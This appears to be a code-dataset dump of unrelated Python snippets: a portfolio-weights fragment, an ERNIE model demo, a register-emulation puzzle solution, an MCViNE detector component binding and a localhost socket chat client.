# update frequency
self.opt_weights_kwargs["freq"] = tools.freq(history.index)
hist = history.iloc[-self.n :] if self.n else history
ws = tools.opt_weights(hist, **self.opt_weights_kwargs)
return ws
| StarcoderdataPython |
149911 | <gh_stars>1-10
import numpy as np
import paddle.fluid.dygraph as D
from ernie.tokenizing_ernie import ErnieTokenizer
from ernie.modeling_ernie import ErnieModel
D.guard().__enter__() # activate paddle `dygrpah` mode
model = ErnieModel.from_pretrained('ernie-1.0') # Try to get pretrained model from server, make sure you have network connection
# model.eval()是去掉训练过程(也就是没有了反向计算过程),只是测试
model.eval() #加载模型并将模型的状态设置为校验状态(eval),显式告诉框架我们接下来只会使用前向计算的流程,不会计算梯度和梯度反向传播,这将减少内存的消耗。
tokenizer = ErnieTokenizer.from_pretrained('ernie-1.0')
ids, _ = tokenizer.encode('hello world')
ids = D.to_variable(np.expand_dims(ids, 0)) # insert extra `batch` dimension
pooled, encoded = model(ids) # eager execution
print(pooled.numpy()) # convert results to numpy
| StarcoderdataPython |
3332221 | <reponame>agral/CompetitiveProgramming
#!/usr/bin/env python3
"""
MIT License
Copyright (c) 2017 <NAME> (<EMAIL>)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
def emulate():
r = {
"a": 1,
"b": 81,
"c": 0,
"d": 0,
"e": 0,
"f": 0,
"g": 0,
"h": 0
}
r["b"] *= 100
r["b"] += 100000
r["c"] = r["b"] + 17000
done = False
while not done:
r["f"] = 1
r["d"] = 2
k = r["d"]
while k * k < r["b"]:
if r["b"] % k == 0:
r["f"] = 0
break
k += 1
if r["f"] == 0:
r["h"] += 1
r["g"] = r["b"] - r["c"]
r["b"] += 17
done = (r["g"] == 0)
print(r["h"])
emulate()
| StarcoderdataPython |
3301873 | <reponame>mcvine/mcvine
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# <NAME>
# California Institute of Technology
# (C) 2007 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
class EventModeMCA:
def __init__(self, outfilename, detectorDims ):
'''event mode multi channel analyzer
outfilename: output data file name
detectorDims: dimensions of detector system.
For example, a detector system of 100 packs, 8 tubes per pack, 100 pixels per tube:
detectorDims = 100, 8, 100
'''
self.outfilename = outfilename
self.detectorDims = detectorDims
return
def identify(self, visitor):
return visitor.onEventModeMCA(self)
pass # end of EventModeMCA
# 2. the handler to construct c++ engine
def onEventModeMCA(self, mca):
return self.factory.eventmodemca( mca.outfilename, mca.detectorDims )
def bp_eventmodemca( self, outfilename, detectorDims ):
import mccomponents.mccomponentsbp as b
dims = b.vector_uint( 0 )
for dim in detectorDims: dims.append(dim)
return b.EventModeMCA( outfilename, dims )
# 4. register the new class and handlers
import mccomponents.homogeneous_scatterer as mh
mh.register(EventModeMCA, onEventModeMCA,
{'BoostPythonBinding': bp_eventmodemca})
# version
__id__ = "$Id$"
# End of file
| StarcoderdataPython |
3220431 | <reponame>li195111/PyChat
import socket
HOST = "localhost"
PORT = 9999
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("localhost", 9999))
print (f"Start Connect ... {HOST}:{PORT}")
done = False
msg = ''
msg_send = ''
while not done:
try:
msg_send = input("Message: ")
client.send(msg_send.encode('utf-8'))
if msg_send == 'quit':
done = True
msg = client.recv(1024).decode('utf-8')
if msg and msg != 'quit':
print (f"Received: {msg}")
else:
client.send('quit'.encode('utf-8'))
done = True
except KeyboardInterrupt:
done = True
client.close() | StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.